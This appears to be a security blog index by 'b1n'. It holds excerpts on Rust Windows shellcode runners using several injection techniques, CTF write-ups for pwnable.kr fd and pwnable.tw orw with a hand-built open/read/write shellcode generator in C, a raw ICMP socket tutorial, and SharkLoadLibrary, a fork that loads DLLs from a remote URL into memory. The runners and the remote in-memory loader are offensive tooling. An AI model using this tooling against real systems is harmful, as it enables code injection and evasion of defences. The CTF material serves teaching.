Rust Shellcode

I made a repository of Windows shellcode runners: rust-shellcode. Here is a short introduction. Runners in rust-shellcode: asm, create_fiber, create_remote_thread, create_remote_thread_native, create_thread, create_thread_native, etwp_create_etw_thread, nt_queue_apc_thread_ex_local, rtl_create_user_thread. asm: executes the shellcode locally; links the shellcode into the .text section, then calls it from inline assembly written with the asm! macro. create_fiber: executes the shellcode locally; converts the current thread to a fiber with ConvertThreadToFiber, allocates memory with VirtualAlloc, copies the shellcode into the allocation with std::ptr::copy, creates a fiber with CreateFiber, jumps into the shellcode with SwitchToFiber, and jumps back. create_remote_thread: executes the shellcode remotely....
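The allocate, copy, jump sequence that the create_fiber runner describes, as an added example in C that is not code from rust-shellcode: mmap and mprotect stand in for VirtualAlloc and VirtualProtect, and the "shellcode" is a constructed stub that only returns 42 (mov eax, 42; ret on x86-64, mov w0, #42; ret on aarch64) so the run path can be checked without a real payload. The memory is mapped writable, filled, and only then flipped to executable; that W^X ordering is a choice made here, not something the runner is claimed to do.

```c
#define _DEFAULT_SOURCE 1
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/* Constructed stub standing in for shellcode: it just returns 42.
 * x86-64:  B8 2A 00 00 00  mov eax, 42 ; C3 ret
 * aarch64: 40 05 80 52     mov w0, #42 ; C0 03 5F D6 ret */
#if defined(__x86_64__)
static const uint8_t STUB[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };
#elif defined(__aarch64__)
static const uint8_t STUB[] = { 0x40, 0x05, 0x80, 0x52, 0xC0, 0x03, 0x5F, 0xD6 };
#else
static const uint8_t STUB[] = { 0x00 };   /* no stub for this architecture */
#endif

typedef uint32_t (*entry_fn)(void);

/* Allocate RW memory, copy the code in, flip the page to RX, call it.
 * Returns what the code returns, or -1 if any step fails. */
long run_shellcode(const uint8_t *code, size_t len)
{
    if (code == NULL || len == 0)
        return -1;

    /* VirtualAlloc(MEM_COMMIT, PAGE_READWRITE) equivalent */
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;

    memcpy(mem, code, len);                  /* std::ptr::copy in the runner */

    /* VirtualProtect(PAGE_EXECUTE_READ) equivalent: never leave the page RWX */
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return -1;
    }
#if defined(__aarch64__)
    /* I-cache and D-cache are not coherent on arm64; sync before executing */
    __builtin___clear_cache((char *)mem, (char *)mem + len);
#endif

    entry_fn entry = (entry_fn)mem;          /* data pointer -> function pointer */
    long ret = (long)entry();                /* the "jump" into the shellcode */

    munmap(mem, len);
    return ret;
}

/* Runs the constructed stub; -1 on an architecture without one. */
long run_stub(void)
{
#if defined(__x86_64__) || defined(__aarch64__)
    return run_shellcode(STUB, sizeof STUB);
#else
    return -1;
#endif
}
```

The cast from a data pointer to a function pointer is the same trick every runner relies on; compilers accept it on the platforms this targets but it is not guaranteed by the C standard, which is why the Rust version needs an unsafe block for it too.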

March 23, 2023 · b1n

Pwnable.kr

Toddler’s Bottle: fd. This write-up was written after I passed the challenge, and it is a very easy one. Connect to the server with the given user and password, then run ls -l to check what is in the directory. I found these: cat fd.c to read the source code. The program verifies that the command line argument count is at least two; if not, it prints a hint. It then converts argv[1] from ASCII to a number and subtracts 0x1234 from it....
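The argument handling the write-up describes, as an added example rather than the challenge's own fd.c: argv[1] is converted to a number and 0x1234 is subtracted. The assumption made here, suggested by the challenge name, is that the result is then used as a file descriptor to read from. The pipe in the demonstration is constructed for the example; it stands in for whatever descriptor the number lands on.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define FD_BIAS 0x1234            /* the constant named in the write-up */

/* The number the program derives from argv[1]: decimal text minus 0x1234. */
int fd_from_arg(const char *arg)
{
    return atoi(arg) - FD_BIAS;
}

/* Read up to cap-1 bytes from fd and NUL-terminate them.
 * Returns the byte count, or -1 on error. */
ssize_t read_via_fd(int fd, char *buf, size_t cap)
{
    if (buf == NULL || cap == 0)
        return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;
}

/* Constructed demonstration: a pipe plays the role of the descriptor the
 * caller steers the program to. The argument string is built so that, after
 * the subtraction, it equals the pipe's read end. Returns 1 if the bytes
 * written into the pipe come back through the program's read path. */
int demo_pipe_roundtrip(void)
{
    int fds[2];
    if (pipe(fds) != 0)
        return 0;

    const char *msg = "constructed pipe data\n";
    size_t msg_len = strlen(msg);
    if (write(fds[1], msg, msg_len) != (ssize_t)msg_len) {
        close(fds[0]);
        close(fds[1]);
        return 0;
    }
    close(fds[1]);

    char arg[32];                 /* what a user would type as argv[1] */
    snprintf(arg, sizeof arg, "%d", fds[0] + FD_BIAS);

    char buf[64];
    int ok = 0;
    if (read_via_fd(fd_from_arg(arg), buf, sizeof buf) == (ssize_t)msg_len &&
        strcmp(buf, msg) == 0)
        ok = 1;

    close(fds[0]);
    return ok;
}
```

Because 0x1234 is 4660, an argument of "4660" yields descriptor 0, which is standard input: the caller, not the program, decides where the bytes come from.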

March 20, 2023 · b1n

Raw Socket

A summary of Linux raw sockets: the structs and constants involved, ending with receiving and replying to ICMP. Creating the socket: int sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); creates an IPv4 ICMP raw socket. AF_INET: the IPv4 protocol family; SOCK_RAW: a raw socket; IPPROTO_ICMP: the ICMP protocol. Stopping the kernel from attaching the IP header automatically: int on = 1; setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); With IP_HDRINCL enabled, the data you send must already contain the IP header: you build it yourself and the kernel no longer generates it. This affects sending only; on receive, an IPv4 raw socket always hands you the IP header. Receiving data: char* buf = calloc(1, IPPROTO_MAX); struct sockaddr in; socklen_t in_len = sizeof(in); recvfrom(sock, buf, IPPROTO_MAX, 0, &in, &in_len); writes the datagram into buf and stores the sender's address in in. Note that IPPROTO_MAX is a bound on protocol numbers, not a packet size; a buffer of 65535 bytes is needed to hold the largest IPv4 datagram without truncation. Parsing the data: struct iphdr *ip = (struct iphdr*)buf; struct icmphdr *icmp = (struct icmphdr*)((char*)ip + 4 * ip->ihl); printf("data: %s\n", (char*)icmp + 8); iphdr is short for IP header and describes the IP header structure. IHL (Internet Header Length): the IP header is variable-length, so IHL records its size in units of 4 bytes, and the header size is therefore 4 * IHL bytes...
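The parsing step described above, carried through to the echo reply the post ends with, as an added example that is not the post's own code: the IPv4 header length is taken from IHL, every length is checked against the buffer before it is used as an offset, the ICMP checksum is verified, and a reply is built for an echo request. Header fields are read at their byte offsets so the example does not depend on struct iphdr, and the sample datagram is constructed for the example (the IP header checksum is not re-checked here).

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>      /* IPPROTO_ICMP */

#define IPV4_MIN_HDR      20
#define ICMP_HDR_LEN      8
#define ICMP_ECHO_REQUEST 8
#define ICMP_ECHO_REPLY   0

/* Where the ICMP message sits inside the datagram and what it carries. */
struct icmp_msg {
    size_t ip_hdr_len;        /* 4 * IHL, the same arithmetic as 4 * ip->ihl */
    uint8_t type, code;
    const uint8_t *hdr;       /* start of the 8-byte ICMP header */
    const uint8_t *payload;   /* hdr + 8, what the post prints as "data" */
    size_t payload_len;
};

/* RFC 1071 ones'-complement checksum. Run over a message whose checksum
 * field is already correct it returns 0. */
uint16_t inet_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; len -= 2, data += 2)
        sum += (uint32_t)((data[0] << 8) | data[1]);
    if (len == 1)
        sum += (uint32_t)(data[0] << 8);         /* odd trailing byte */
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);      /* fold carries */
    return (uint16_t)~sum;
}

/* Parse one datagram exactly as recvfrom() delivers it on a SOCK_RAW /
 * IPPROTO_ICMP socket (IPv4 header included). Returns 0 on success, -1 if
 * the datagram is truncated, malformed, not ICMP, or has a bad checksum. */
int parse_icmp_datagram(const uint8_t *buf, size_t len, struct icmp_msg *out)
{
    if (buf == NULL || out == NULL || len < IPV4_MIN_HDR)
        return -1;
    uint8_t version = buf[0] >> 4;
    uint8_t ihl = buf[0] & 0x0F;                 /* header length in 4-byte units */
    if (version != 4 || ihl < 5)
        return -1;
    size_t ip_hdr_len = (size_t)ihl * 4;
    uint16_t tot_len = (uint16_t)((buf[2] << 8) | buf[3]);
    /* total length must cover the IP header plus an ICMP header, and must
     * not claim more bytes than recvfrom() actually returned */
    if (tot_len < ip_hdr_len + ICMP_HDR_LEN || tot_len > len)
        return -1;
    if (buf[9] != IPPROTO_ICMP)
        return -1;

    const uint8_t *icmp = buf + ip_hdr_len;
    size_t icmp_len = tot_len - ip_hdr_len;
    if (inet_checksum(icmp, icmp_len) != 0)
        return -1;

    out->ip_hdr_len = ip_hdr_len;
    out->type = icmp[0];
    out->code = icmp[1];
    out->hdr = icmp;
    out->payload = icmp + ICMP_HDR_LEN;
    out->payload_len = icmp_len - ICMP_HDR_LEN;
    return 0;
}

/* Build the echo reply for a parsed echo request: type 0, same identifier,
 * sequence number and payload, fresh checksum. The result has no IP header,
 * which is what you pass to sendto() when IP_HDRINCL is left off. Returns
 * the reply length, or -1 if the request is not an echo request or out is
 * too small. */
ssize_t build_echo_reply(const struct icmp_msg *req, uint8_t *out, size_t cap)
{
    if (req == NULL || req->type != ICMP_ECHO_REQUEST || req->code != 0)
        return -1;
    size_t need = ICMP_HDR_LEN + req->payload_len;
    if (out == NULL || cap < need)
        return -1;
    out[0] = ICMP_ECHO_REPLY;
    out[1] = 0;
    out[2] = 0;                                  /* checksum field zeroed */
    out[3] = 0;                                  /* while computing it */
    memcpy(out + 4, req->hdr + 4, 4);            /* identifier + sequence */
    memcpy(out + ICMP_HDR_LEN, req->payload, req->payload_len);
    uint16_t c = inet_checksum(out, need);
    out[2] = (uint8_t)(c >> 8);
    out[3] = (uint8_t)(c & 0xFF);
    return (ssize_t)need;
}

/* Constructed sample: a 20-byte IPv4 header (10.0.0.1 -> 10.0.0.2, TTL 64,
 * protocol 1) followed by an echo request, id 0x1234, seq 1, payload "hi". */
const uint8_t SAMPLE_ECHO_REQUEST[30] = {
    0x45, 0x00, 0x00, 0x1E, 0x00, 0x01, 0x00, 0x00, 0x40, 0x01, 0x00, 0x00,
    0x0A, 0x00, 0x00, 0x01, 0x0A, 0x00, 0x00, 0x02,
    0x08, 0x00, 0x7D, 0x61, 0x12, 0x34, 0x00, 0x01, 0x68, 0x69
};
```

The two bounds checks are the part the one-liner on the page skips: a forged IHL of 15 would move the icmp pointer 60 bytes into a 30-byte buffer, and a total length larger than the bytes received would make the payload read past the end of buf.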

March 8, 2023 · b1n

SharkLoadLibrary

SharkLoadLibrary is the completed version of DarkLoadLibrary. In DarkLoadLibrary's darkloadlibrary.h the author defines a set of macros for the control flags: #define LOAD_LOCAL_FILE 0x00000001 #define LOAD_REMOTE_FILE 0x00000002 #define LOAD_MEMORY 0x00000003 #define NO_LINK 0x00010000. As you can see, the author had already defined the LOAD_REMOTE_FILE macro; the corresponding functionality was simply removed before the project was published. I completed that functionality and open-sourced it on GitHub for everyone to use: SharkLoadLibrary. The project description follows: LoadLibrary for Children’s Paradise. :sailboat: Forked from DarkLoadLibrary, with thanks. Feature New feature: LOAD_REMOTE_FILE Usage PDARKMODULE DarkModule = DarkLoadLibrary( LOAD_REMOTE_FILE, // control flags "http://xxxx/demo.dll", // remote dll url, if loading from remote NULL, // dll buffer to load from if loading from memory 0, // dll size if loading from memory "Demo" // dll name if loaded from memory and remote ); Build && Test Environmental requirements libcurl Install from vcpkg: ....

December 26, 2022 · b1n

Pwnable.tw Orw

Challenge hint: Read the flag from /home/orw/flag. Only open read write syscall are allowed to use. checksec: [*] '/home/kkkk/code/orw' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments. The decompiled pseudocode: int __cdecl main(int argc, const char **argv, const char **envp) { orw_seccomp(); printf("Give my your shellcode:"); read(0, &shellcode, 0xC8u); ((void (*)(void))shellcode)(); return 0; } It reads 0xC8 bytes, then casts the buffer to a function pointer and calls it. All this challenge needs is open/read/write shellcode, which pwntools can generate automatically: from pwn import * context(os="linux", arch="i386", log_level="debug") r = remote("chall....
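The open/read/write shellcode the challenge asks for, assembled by hand in C instead of with pwntools, as an added example that is not part of the write-up: the path is pushed onto the stack a dword at a time, open(path, O_RDONLY) is made with eax=5, read(fd, esp, 0x40) with eax=3, and write(1, esp, bytes_read) with eax=4, all through int 0x80 (i386 Linux). The path and the 0x40-byte read size are the assumptions the builder takes as parameters; nothing beyond the three permitted syscalls is used.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Append n bytes at out[pos]; returns the new position, or SIZE_MAX once
 * any append has overflowed cap (the error is sticky). */
static size_t emit(uint8_t *out, size_t cap, size_t pos, const uint8_t *bytes, size_t n)
{
    if (pos == SIZE_MAX || cap - pos < n)
        return SIZE_MAX;
    memcpy(out + pos, bytes, n);
    return pos + n;
}

#define EMIT(...) do {                                         \
        static const uint8_t b_[] = { __VA_ARGS__ };           \
        pos = emit(out, cap, pos, b_, sizeof b_);              \
    } while (0)

/* Build i386 Linux shellcode that opens `path`, reads up to 0x40 bytes from
 * it to the stack and writes them to stdout. Returns the length, or 0 if
 * the path is empty or too long or `out` is too small. */
size_t build_orw_shellcode(const char *path, uint8_t *out, size_t cap)
{
    size_t plen = strlen(path);
    if (plen == 0 || plen > 64)
        return 0;

    /* pad to a multiple of 4 with at least one NUL terminator */
    size_t padded = (plen / 4 + 1) * 4;
    uint8_t s[68] = { 0 };
    memcpy(s, path, plen);

    size_t pos = 0;
    /* Push the string last dword first so its start ends up at esp.
     * `push imm32` is 68 xx xx xx xx; the immediate is stored little-endian
     * and so is the dword on the stack, so the raw bytes go in memory order. */
    for (size_t off = padded; off > 0; off -= 4) {
        uint8_t ins[5] = { 0x68 };
        memcpy(ins + 1, s + off - 4, 4);
        pos = emit(out, cap, pos, ins, 5);
    }

    /* open(path at esp, O_RDONLY): eax = 5, ebx = esp, ecx = 0 */
    EMIT(0x89, 0xE3);                 /* mov ebx, esp          */
    EMIT(0x31, 0xC9);                 /* xor ecx, ecx          */
    EMIT(0x31, 0xC0, 0xB0, 0x05);     /* xor eax, eax ; mov al, 5 */
    EMIT(0xCD, 0x80);                 /* int 0x80              */

    /* read(fd = eax, esp, 0x40): eax = 3; reusing the path bytes as buffer */
    EMIT(0x89, 0xC3);                 /* mov ebx, eax          */
    EMIT(0x89, 0xE1);                 /* mov ecx, esp          */
    EMIT(0x31, 0xD2, 0xB2, 0x40);     /* xor edx, edx ; mov dl, 0x40 */
    EMIT(0x31, 0xC0, 0xB0, 0x03);     /* xor eax, eax ; mov al, 3 */
    EMIT(0xCD, 0x80);                 /* int 0x80              */

    /* write(1, esp, bytes_read): eax = 4, ebx = 1, ecx still esp, edx = eax */
    EMIT(0x89, 0xC2);                 /* mov edx, eax          */
    EMIT(0x31, 0xDB, 0x43);           /* xor ebx, ebx ; inc ebx */
    EMIT(0x31, 0xC0, 0xB0, 0x04);     /* xor eax, eax ; mov al, 4 */
    EMIT(0xCD, 0x80);                 /* int 0x80              */

    return pos == SIZE_MAX ? 0 : pos;
}
```

For /home/orw/flag the result is 55 bytes, well inside the 0xC8 the program reads; the shellcode contains NUL bytes, which is fine here because it arrives through read() rather than a string copy. The read overwrites the pushed path, which no longer matters once open has returned.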

December 25, 2022 · b1n